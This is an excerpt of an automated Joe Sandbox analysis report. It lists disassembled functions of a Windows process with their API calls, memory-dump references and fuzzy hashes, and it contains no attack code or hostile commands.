                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 1497570035-0
                                                                                          • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                          • Instruction ID: dc66613b06964d00034f332daa1846915d0c7ba71147e6895922e5b09744fd62
                                                                                          • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                          • Instruction Fuzzy Hash: BDC13732E0F683A2EA54DB15A5502B967A0FF95780F044136EA5EC77D6EF3CE404E700
                                                                                          Function 00007FF6A0E97B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 3541575487-0
                                                                                          • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                          • Instruction ID: 18c5ed0258da19eec1aa3b257fa8e119d0a901afb5ac80d858bd8b5801508dbc
                                                                                          • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                          • Instruction Fuzzy Hash: 12A14871B1A39761EE249F6594942BDA291FF49BE0F444234EEAEC77C4EE3CE445A300
                                                                                          Function 00007FF6A0E76BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • _pipe.MSVCRT ref: 00007FF6A0E76C1E
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E76CD1
                                                                                          • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6A0E76CFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                          • String ID:
                                                                                          • API String ID: 624391571-0
                                                                                          • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                          • Instruction ID: 4e91ac35c67acd9657ed0f3fac6f009b9de37c2f49fae842ddac4867cf809049
                                                                                          • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                          • Instruction Fuzzy Hash: 9E719B32E0A743A6E754AF35D84017976A1FF89764F188238DA5DD63E7CF3CA842A740
                                                                                          Function 00007FF6A0E963FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                          • String ID:
                                                                                          • API String ID: 4268342597-0
                                                                                          • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                          • Instruction ID: 371fed3cb827ede49506a4736e7ab513ca2764a0ff35cb7a10b78db00b2956c8
                                                                                          • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                          • Instruction Fuzzy Hash: AE815D32A0AB83A2EB648F25A540239B7A0FF89BC4F188136DD5D87755DF7DE481E740
                                                                                          Function 00007FF6A0E888C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: OpenToken$CloseProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2991381754-0
                                                                                          • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                          • Instruction ID: 9f0bb0e682cb894b59bfdf03910af521afb08ea46a428f6707cef5f8a39c763f
                                                                                          • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                          • Instruction Fuzzy Hash: C8219C32A09683ABE7509BA4D5402BDB7A0FB897A1F504135EF5D83794DF7CE848DB00
                                                                                          Function 00007FF6A0E7586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF6A0E9C59E), ref: 00007FF6A0E75879
                                                                                            • Part of subcall function 00007FF6A0E758D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E75903
                                                                                            • Part of subcall function 00007FF6A0E758D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E75943
                                                                                            • Part of subcall function 00007FF6A0E758D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E75956
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValueVersion
                                                                                          • String ID: %d.%d.%05d.%d
                                                                                          • API String ID: 2996790148-3457777122
                                                                                          • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                          • Instruction ID: d6c311c2cba31621f289cca04bab0352a001ce5288981b059efdb44ec95f79af
                                                                                          • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                          • Instruction Fuzzy Hash: 3DF0A072A08382A7D3109F25B44006AAAA1FBC8781F548138EA8A47B5ACF3CD524CB40
                                                                                          Function 00007FF6A0E87854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ErrorFileFindFirstLast
                                                                                          • String ID:
                                                                                          • API String ID: 2831795651-0
                                                                                          • Opcode ID: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                          • Instruction ID: df554377f6ba9bbac17814c4ae576d52d07596fcacaabb57805c1585e2cd96c9
                                                                                          • Opcode Fuzzy Hash: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                          • Instruction Fuzzy Hash: 10D1E472B0A683A6E764CF21E4802BA77A1FB84794F105135DE8E87794DF3CE559D700
                                                                                          Function 00007FF6A0E77D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00007FF6A0E77DA1
                                                                                            • Part of subcall function 00007FF6A0E8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E841AD
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D46E
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D485
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D4EE
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: iswspace.MSVCRT ref: 00007FF6A0E7D54D
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D569
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D58C
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E77EB7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                          • String ID:
                                                                                          • API String ID: 168394030-0
                                                                                          • Opcode ID: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                          • Instruction ID: 869abfded15aab2f43a994c03258b30962950d124291ab5c021d3f37a53afd3a
                                                                                          • Opcode Fuzzy Hash: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                          • Instruction Fuzzy Hash: BDA1C431F0A683A5FB648B2599502BA23A1FF85784F444135DE5EC7BE6EF3CE449A700
                                                                                          Function 00007FF6A0E889E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQueryToken
                                                                                          • String ID:
                                                                                          • API String ID: 4239771691-0
                                                                                          • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                          • Instruction ID: 887235125445508f6b895670384f62b2d4eaeb42621d137eca30ec132e5fff38
                                                                                          • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                          • Instruction Fuzzy Hash: 02113C72A197C2DBEB508F01E5003A9BBA4FB85796F108172DF48827A4DF7DE588CB40
                                                                                          Function 00007FF6A0E88114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileInformation$HandleQueryVolume
                                                                                          • String ID:
                                                                                          • API String ID: 2149833895-0
                                                                                          • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                          • Instruction ID: af9bbde53391ced2f5f23dd3862675c368395fbc40175c60249f7d05804002ef
                                                                                          • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                          • Instruction Fuzzy Hash: 0411703260A7C29AEB608B60F5443AEB7A0FB88B84F545131DA9D82B55DFBCD44DDB00
                                                                                          Function 00007FF6A0E78510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D46E
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D485
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D4EE
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: iswspace.MSVCRT ref: 00007FF6A0E7D54D
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D569
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D58C
                                                                                          • towupper.MSVCRT ref: 00007FF6A0E785D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                          • String ID:
                                                                                          • API String ID: 3520273530-0
                                                                                          • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                          • Instruction ID: 49874f4cbed7aa9f4880593032fe98deb64e1c7151b347011e2451003572a72d
                                                                                          • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                          • Instruction Fuzzy Hash: CE61C232A0E243A6F7A49F24D61437D76A0FB18754F408136DA5ED63E6DF3CA898A311
                                                                                          Function 00007FF6A0E8898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQueryToken
                                                                                          • String ID:
                                                                                          • API String ID: 4239771691-0
                                                                                          • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                          • Instruction ID: b9cb35f2638333136298c8e016304dd7bc5ba7495e1390c5856d96dff6cb7807
                                                                                          • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                          • Instruction Fuzzy Hash: 5FF030B3704B82DBD7008F64E58449CB778FB48B85765853ACB2C43704DB75D9A4CB40
                                                                                          Function 00007FF6A0E893B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E893BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                          • Instruction ID: 608afb785f915cb69698ec3823be8458c5cbb91fa07cded82a20d6617b89a6dd
                                                                                          • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                          • Instruction Fuzzy Hash: 76B00264E66443F2D608AB759C9506512A07B5C711FE51472D10EC5260DE5D959B9700
                                                                                          Function 00007FF6A0E7F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF6A0E7F52A,00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F8DE
                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F8FB
                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F951
                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F96B
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7FA8E
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E7FB14
                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7FB2D
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7FBEA
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E7F996
                                                                                            • Part of subcall function 00007FF6A0E80010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6A0E9849D,?,?,?,00007FF6A0E9F0C7), ref: 00007FF6A0E80045
                                                                                            • Part of subcall function 00007FF6A0E80010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E9F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E80071
                                                                                            • Part of subcall function 00007FF6A0E80010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E80092
